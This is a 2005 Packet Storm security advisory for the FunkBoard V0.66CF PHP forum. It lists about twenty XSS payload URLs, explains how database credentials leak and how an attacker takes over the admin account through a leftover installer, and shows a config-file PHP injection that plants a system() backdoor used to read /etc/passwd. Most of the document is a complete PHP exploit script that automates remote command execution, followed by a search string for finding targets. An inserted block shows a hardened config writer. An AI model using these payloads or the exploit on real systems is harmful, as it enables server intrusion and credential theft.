funkboard066.txt

Date: 10 Aug 2005
Reported by: rgod
Type: packetstorm
Source: packetstormsecurity.com

FunkBoard V0.66CF security issues: XSS, database disclosure, remote code execution

Code
FunkBoard V0.66CF (possibly prior versions) cross site scripting,
possible database username/password disclosure & board takeover,
possible remote code execution
  
  
software:  
author site: http://www.[path_to_funkboard].co.uk/  
  
xss:  
http://[target]/[path_to_funkboard]/editpost.php?fbusername="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/editpost.php?fbpassword="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/prefs.php?fbpassword="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/prefs.php?fbusername="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/profile.php?fbusername="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/profile.php?fbpassword="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?fbusername="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?fmail="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?www="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?icq="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?yim="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?location="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?sex="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?interebbies="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?sig=</textarea><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?aim="><script>alert(document.cookie)</script>  
  
path disclosure:   
http://[target]/[path_to_funkboard]/images/forums.php  
  
database username & password disclosure:  
  
during installation the user is not reminded to delete the mysql_install script, and the installer
does not delete it itself, so it usually remains at:
  
http://[target]/[path]/admin/mysql_install.php   
  
or  
  
http://[target]/[path]/admin/pg_install.php  
  
there, a user can see the database username & password in clear text...
  
Then the script lets the user proceed to the next page, where he can reset the FunkBoard administrator
username & password. At this point the script fails, because some tables already exist, etc.
So the user can go back and set a new database name for the installation, guessing among other
installations on the server...
Once the installation succeeds he can set a new admin username and password, then log in at this page:
  
http://[target]/[path]/[path_to_funkboard]/admin/index.php  
  
Now the user can edit templates and append some evil javascript code.  
  
  
remote code execution:  
  
look at this code in mysql_install.php :  
  
$infoout = "<?php\n\n// server name, eg. localhost\n\$server = '$server1';\n// your database's name\n\$dbname = '$dbname1';\n// your username to access that database\n\$dbuser = '$dbuser1';";  
$infoout.= "\n// your password to access that database\n\$dbpass = '$dbpass1';\n\n// a contact email for when errors arise\n\$email = '$email1';";  
$infoout.= "\n\n// database engine- 'mysql' or 'postgres'\n\$dbtype='$dbtype1';\n\n?>";  
  
echo "Writing Config File<br>";  
unlink ("../info.php");  
  
$outname="../info.php";  
$file = fopen($outname,"w+");  
fputs($file, $infoout);  
fclose($file);  
  
clearly, PHP code can be injected here. Example:
  
go to http://[target]/[path]/admin/mysql_install.php   
  
in the email field (which is not validated) write:
  
[email protected]'; error_reporting(0); system($HTTP_GET_VARS[command]); echo '  
  
press continue...  
  
now look at info.php, the config file in the main directory; it contains:
  
<?php  
  
// server name, eg. localhost  
$server = 'localhost';  
// your database's name  
$dbname = 'dbname';  
// your username to access that database  
$dbuser = 'dbuser';  
// your password to access that database  
$dbpass = 'dbpassword';  
  
// a contact email for when errors arise  
$email = '[email protected]'; error_reporting(0); system($HTTP_GET_VARS[command]); echo '';  
  
// database engine- 'mysql' or 'postgres'  
$dbtype='mysql';  
  
?>  
  
so, there is now a backdoor on the target system...
  
commands can be launched through URLs like these:
  
http://localhost:30/funkboard/info.php?command=ls%20-la  
  
to list directories...  
  
http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd  
  
to view the /etc/passwd file
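The root cause above is that mysql_install.php splices raw form values into PHP source text. The following is an added example, not FunkBoard's or rgod's code: it places that string-splicing writer beside a hardened writer that validates the email, restricts the engine to the two known values, emits every value with var_export() so a quoted payload stays a string literal, and refuses to run once info.php exists (the exposed-installer problem from the database-disclosure section). The function names, the tokenizer-based check and the sample field values are constructed for this example.

```php
<?php
// Added example, not FunkBoard's own code: the installer's string-splicing config
// writer beside a hardened one that emits PHP literals with var_export() and refuses
// to run once info.php exists. Field names follow the advisory; values are test data.

function vulnerableConfig(array $f): string {
    // Same pattern as mysql_install.php: raw form values spliced into source text.
    return "<?php\n\$dbpass = '{$f['dbpass']}';\n\$email = '{$f['email']}';\n";
}

function hardenedConfig(array $f, string $configPath = ''): string {
    if ($configPath !== '' && file_exists($configPath)) {
        throw new RuntimeException('already installed; remove the installer');
    }
    if (filter_var($f['email'], FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('invalid contact email');
    }
    if (!in_array($f['dbtype'], ['mysql', 'postgres'], true)) {
        throw new InvalidArgumentException('unknown database engine');
    }
    $out = "<?php\n";
    foreach (['server', 'dbname', 'dbuser', 'dbpass', 'email', 'dbtype'] as $k) {
        // var_export() escapes quotes and backslashes, so each value stays one string literal.
        $out .= '$' . $k . ' = ' . var_export((string) $f[$k], true) . ";\n";
    }
    return $out;
}

// True if $name appears as a bare identifier (a call), not inside a string literal.
function containsCall(string $src, string $name): bool {
    foreach (token_get_all($src) as $t) {
        if (is_array($t) && $t[0] === T_STRING && $t[1] === $name) {
            return true;
        }
    }
    return false;
}

// The advisory's email payload, plus a password that attempts the same break-out.
$payload = "x@example.com'; error_reporting(0); system(\$HTTP_GET_VARS[command]); echo '";
$fields = ['server' => 'localhost', 'dbname' => 'db', 'dbuser' => 'u', 'dbtype' => 'mysql',
           'dbpass' => "p'; system(\$HTTP_GET_VARS[command]); echo '", 'email' => 'admin@example.com'];
echo 'vulnerable writer emits a system() call: ', var_export(containsCall(vulnerableConfig(['dbpass' => 'x', 'email' => $payload]), 'system'), true), "\n";
echo 'hardened writer emits a system() call: ', var_export(containsCall(hardenedConfig($fields), 'system'), true), "\n";
try {
    hardenedConfig(['email' => $payload] + $fields);
} catch (InvalidArgumentException $e) {
    echo 'hardened writer rejected the payload: ', $e->getMessage(), "\n";
}
```

The tokenizer check is also a cheap post-install audit: a generated info.php should contain only assignments of string literals, never a bare identifier such as system.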
  
this is my proof of concept exploit:  
  
<?php  
/* FunkBoard V0.66CF (possibly prior versions) remote code execution  
by rgod  
site: http://rgod.altervista.org  
  
  
make these changes in php.ini if you have troubles  
with this script:  
allow_call_time_pass_reference = on  
register_globals = on */  
error_reporting(0);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout", 2);  
ob_implicit_flush (1);  
  
echo '<head><title>FunkBoard V0.66CF remote commands execution</title>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
<style type="text/css">  
<!--  
body,td,th {color: #00FF00;}  
body {background-color: #000000;}  
.Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }  
.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;  
font-weight: bold;  
font-style: italic;  
}  
-->  
</style></head>  
<body>  
<p class="Stile6">FunkBoard V0.66CF (possibly prior versions) remote commands execution</p>  
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p>  
<table width="84%" >  
<tr>  
<td width="43%">  
<form name="form1" method="post" action="'.$PHP_SELF.'?path=value&host=value&port=value&command=value&proxy=value">  
<p>  
<input type="text" name="host">  
<span class="Stile5">hostname (ex: www.sitename.com) </span></p>  
<p>  
<input type="text" name="path">  
<span class="Stile5">path (ex: /funkboard/ or /forum/ just /) </span></p>  
<p>  
<input type="text" name="port">  
<span class="Stile5">specify a port other than 80 (default value) </span></p>  
<p>  
<input type="text" name="command">  
<span class="Stile5">a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file </span></p>  
<p>  
<input type="text" name="proxy">  
<span class="Stile5">send exploit through an HTTP proxy (ip:port) </span></p>  
<p>  
<input type="submit" name="Submit" value="go!">  
</p>  
</form></td>  
</tr>  
</table>  
</body>  
</html>';  
  
function show($headeri)  
{  
$ii=0;  
$ji=0;  
$ki=0;  
$ci=0;  
echo '<table border="0"><tr>';  
while ($ii <= strlen($headeri)-1)  
{  
$datai=dechex(ord($headeri[$ii]));  
if ($ji==16) {  
$ji=0;  
$ci++;  
echo "<td>&nbsp;&nbsp;</td>";  
for ($li=0; $li<=15; $li++)  
{ echo "<td>".$headeri[$li+$ki]."</td>";  
}  
$ki=$ki+16;  
echo "</tr><tr>";  
}  
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else  
{echo "<td>".$datai."</td> ";}  
$ii++;  
$ji++;  
}  
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)  
{ echo "<td>&nbsp&nbsp</td>";  
}  
  
for ($li=$ci*16; $li<=strlen($headeri); $li++)  
{ echo "<td>".$headeri[$li]."</td>";  
}  
  
echo "</tr></table>";  
}  
  
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';  
  
if (($path<>'') and ($host<>'') and ($command<>''))  
{  
  
  
if ($port=='') {$port=80;}  
if ($proxy=='')  
{$packet="GET ".$path."admin/mysql_install.php HTTP/1.1\r\n";}  
else  
{  
$c = preg_match_all($proxy_regex,$proxy,$is_proxy);  
if ($c==0) {  
echo 'check the proxy...<br>';  
die;  
}  
else  
{$packet="GET http://".$host.$path."admin/mysql_install.php HTTP/1.0\r\n";}  
}  
$packet.="Accept: *//*\r\n";  
$packet.="Accept-Encoding: text/plain\r\n";  
$packet.="Host: ".$host."\r\n\r\n";  
$packet.="Connection: Close\r\n\r\n";  
show($packet);  
if ($proxy=='')  
{$fp=fsockopen(gethostbyname($host),$port);}  
else  
{$parts=explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$fp=fsockopen($parts[0],$parts[1]);  
if (!$fp) { echo 'No response from proxy...';  
die;  
}  
}  
fputs($fp,$packet);  
$data='';  
if ($proxy=='')  
{  
while (!feof($fp))  
{  
$data.=fgets($fp);  
}  
}  
else  
{  
$data='';  
while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))  
{  
$data.=fread($fp,1);  
}  
  
}  
fclose($fp);  
show($data);  
echo '<br>';  
  
if (!eregi('HTTP/1.1 200 OK',$data)) {echo 'Error...see packet dump'; die;}  
  
//************************extract values from form********************************  
  
$parts=explode('value="',$data);  
for ($i=0; $i<=count($parts)-1; $i++)  
{  
$p[$i]=explode('"',$parts[$i]);  
  
if ($i==2) {$server1=$p[$i][0];}  
if ($i==3) {$dbname1=$p[$i][0];}  
if ($i==4) {$dbuser1=$p[$i][0];}  
if ($i==5) {$dbpass1=$p[$i][0];}  
if ($i==6)  
{  
if (eregi('CHECKED',$parts[$i]))  
{ $dbtype1='mysql';}  
else  
{ $dbtype1='postgres';}  
}  
if ($i==8) {$e=$p[$i][0];}  
}  
  
echo 'Server: '.$server1.'<br>';  
echo 'DbName: '.$dbname1.'<br>';  
echo 'DbUser: '.$dbuser1.'<br>';  
echo 'DbPass: '.$dbpass1.'<br>';  
echo 'DbType: '.$dbtype1.'<br>';  
echo 'Email : '.$e.'<br>';  
  
$data="server1=".urlencode($server1)."&dbname1=".urlencode($dbname1)."&dbuser1=";  
$data.=urlencode($dbuser1)."&dbpass1=".urlencode($dbpass1)."&dbtype1=".urlencode($dbtype1)."&email1=".urlencode($e);  
$data.=urlencode("'; error_reporting(0); system(".'$HTTP_GET_VARS[command]'."); echo'");  
$data.="&action=Continue2";  
  
if ($proxy=='')  
{$packet="POST ".$path."admin/mysql_install.php HTTP/1.1\r\n";}  
else  
{  
$c = preg_match_all($proxy_regex,$proxy,$is_proxy);  
if ($c==0) {  
echo 'check the proxy...<br>';  
die;  
}  
else  
{$packet="POST http://".$host.$path."admin/mysql_install.php HTTP/1.1\r\n";}  
}  
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";  
$packet.="Referer: http://".$host.":".$port.$path."mysql_install.php\r\n";  
$packet.="Accept-Language: it\r\n";  
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.="Accept-Encoding: gzip, deflate\r\n";  
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.="Connection: Keep-Alive\r\n";  
$packet.="Cache-Control: no-cache\r\n\r\n";  
$packet.=$data;  
show($packet);  
  
  
if ($proxy=='')  
{$fp=fsockopen(gethostbyname($host),$port);}  
else  
{$parts=explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$fp=fsockopen($parts[0],$parts[1]);  
if (!$fp) { echo 'No response from proxy...';  
die;  
}  
  
}  
fputs($fp,$packet);  
$data='';  
while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))  
{  
$data.=fread($fp,1);  
}  
fclose($fp);  
show($data);  
  
  
if ($proxy=='')  
{$packet="GET ".$path."info.php?command=".urlencode($command)." HTTP/1.1\r\n";}  
else  
{  
$c = preg_match_all($proxy_regex,$proxy,$is_proxy);  
if ($c==0) {  
echo 'check the proxy...<br>';  
die;  
}  
else  
{$packet="GET http://".$host.$path."info.php?command=".urlencode($command)." HTTP/1.1\r\n";}  
}  
  
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";  
$packet.="Accept-Encoding: text/plain\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
show($packet);  
if ($proxy=='')  
{$fp=fsockopen(gethostbyname($host),$port);}  
else  
{$parts=explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$fp=fsockopen($parts[0],$parts[1]);  
if (!$fp) { echo 'No response from proxy...';  
die;  
}  
  
}  
fputs($fp,$packet);  
$data='';  
  
if ($proxy=='')  
{ $data='';  
while (!feof($fp))  
{  
$data.=fgets($fp);  
}  
}  
else  
{  
$data='';  
while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))  
{  
$data.=fread($fp,1);  
}  
  
}  
  
fclose($fp);  
if (eregi('HTTP/1.1 200 OK',$data))  
{echo 'Exploit sent...<br> If FunkBoard is vulnerable <br>';  
echo 'you will see '.htmlentities($command).' output inside HTML...<br><br>';  
}  
else  
{echo 'Error, see output...';}  
echo nl2br(htmlentities($data));  
  
  
$data="server1=".urlencode($server1)."&dbname1=".urlencode($dbname1)."&dbuser1=";  
$data.=urlencode($dbuser1)."&dbpass1=".urlencode($dbpass1)."&dbtype1=".urlencode($dbtype1)."&email1=".urlencode($e);  
$data.="&action=Continue2";  
  
if ($proxy=='')  
{$packet="POST ".$path."admin/mysql_install.php HTTP/1.1\r\n";}  
else  
{  
$c = preg_match_all($proxy_regex,$proxy,$is_proxy);  
if ($c==0) {  
echo 'check the proxy...<br>';  
die;  
}  
else  
{$packet="POST http://".$host.$path."admin/mysql_install.php HTTP/1.1\r\n";}  
}  
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, *//*\r\n";  
$packet.="Referer: http://".$host.":".$port.$path."mysql_install.php\r\n";  
$packet.="Accept-Language: it\r\n";  
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.="Accept-Encoding: gzip, deflate\r\n";  
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.="Connection: Keep-Alive\r\n";  
$packet.="Cache-Control: no-cache\r\n\r\n";  
$packet.=$data;  
show($packet);  
if ($proxy=='')  
{$fp=fsockopen(gethostbyname($host),$port);}  
else  
{$parts=explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$fp=fsockopen($parts[0],$parts[1]);  
if (!$fp) { echo 'No response from proxy...';  
die;  
}  
  
}  
fputs($fp,$packet);  
$data='';  
while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))  
{  
$data.=fread($fp,1);  
}  
fclose($fp);  
show($data);  
  
}  
?>  
  
  
  
googledork: "Powered by FunkBoard"  
  
  
rgod  
site: http://rgod.altervista.org  
mail: [email protected]  
